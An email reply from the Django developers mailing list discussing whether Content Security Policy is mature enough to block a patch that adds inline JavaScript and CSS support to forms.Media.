Re CSP It's more or less fine to start using it. It needs a clean API for configuring it still but it's pretty solid.
However a newish feature that has been added is the ability to allow _some_ inline scripts but not all. This feature doesn't have widespread support yet sadly though. The other thing about CSP is that policies are defined per response. So a page that uses inline scripts could be allowed them while another page doesn't. On May 15, 2013, at 6:28 PM, Aymeric Augustin <[email protected]> wrote: > On 14 mai 2013, at 02:36, Derek Payton <[email protected]> wrote: > >> I have a working patch with tests and docs for #13978, which would add the >> ability to have inline JS and CSS in forms.Media. I feel that this ticket is >> a much better solution than, e.g., scattering the required inline media >> throughout your templates. However the issue was raised that this goes >> against the W3C's Content Security Policy. Per Julian's recommendation, I am >> bringing this here for consideration. >> >> Ticket: https://code.djangoproject.com/ticket/13978 > > > > Disclaimer: I'm certainly not the most qualified person when it comes to > frontend, but since this message didn't get an answer, here's one. > > > Hi Derek, > > https://github.com/dmpayton/django/commit/a676b609004863dd726332df865b9ead7487767e > looks fairly reasonable to me. > > CSP doesn't look ready for general consumption just yet, at least judging by > the two first lines of django-csp's docs: >> Content-Security-Policy is a complicated header. There are many values you >> may need to tweak here. > >> It’s worth reading the latest CSP spec and making sure you understand it >> before configuring django-csp. > Different sites have different security requirements, for instance a site > where only admins can edit stuff is generally immune to XSS. I don't think > the existence of CSP in its current state is a sufficient reason to reject > this ticket. > > A minor suggestion: InlineJS/CSS sounds even more explicit than > EmbeddedJS/CSS. > > I left a few other questions on GitHub. I don't expect a long answer, I just > want to make sure you've considered them. > > -- > Aymeric. > > -- > You received this message because you are subscribed to the Google Groups > "Django developers" group. > To unsubscribe from this group and stop receiving emails from it, send an > email to [email protected]. > To post to this group, send email to [email protected]. > Visit this group at http://groups.google.com/group/django-developers?hl=en. > For more options, visit https://groups.google.com/groups/opt_out. > > -- You received this message because you are subscribed to the Google Groups "Django developers" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. To post to this group, send email to [email protected]. Visit this group at http://groups.google.com/group/django-developers?hl=en. For more options, visit https://groups.google.com/groups/opt_out.
